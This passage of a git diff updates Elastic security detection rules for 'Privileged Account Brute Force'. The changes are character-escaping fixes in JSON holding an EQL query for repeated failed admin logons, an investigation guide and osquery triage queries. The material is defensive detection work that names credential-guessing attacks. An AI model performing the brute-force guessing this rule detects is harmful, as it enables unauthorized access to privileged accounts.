and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where host.os.type == \"windows\" and event.action == \"logon-failed\" and\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and user.name : \"*admin*\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" @@ -67,7 +67,7 @@ ], "risk_score": 47, "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_5.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_5.json index 944018e3cc5..a3513819ca2 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_5.json +++ b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_5.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileged Account Brute Force", - "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where host.os.type == \"windows\" and event.action == \"logon-failed\" and\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and user.name : \"*admin*\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" @@ -67,7 +67,7 @@ ], "risk_score": 47, "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_6.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_6.json index e36f773579a..dc012457d78 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_6.json +++ b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_6.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileged Account Brute Force", - "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and user.name : \"*admin*\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_7.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_7.json index 8c4b35c5380..055a63985f6 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_7.json +++ b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_7.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileged Account Brute Force", - "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and user.name : \"*admin*\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" @@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "f9790abf-bd0c-45f9-8b5f-d0b74015e029", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_8.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_8.json index 7a208192362..2a4ed1a0d81 100644 --- a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_8.json +++ b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_8.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileged Account Brute Force", - "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt 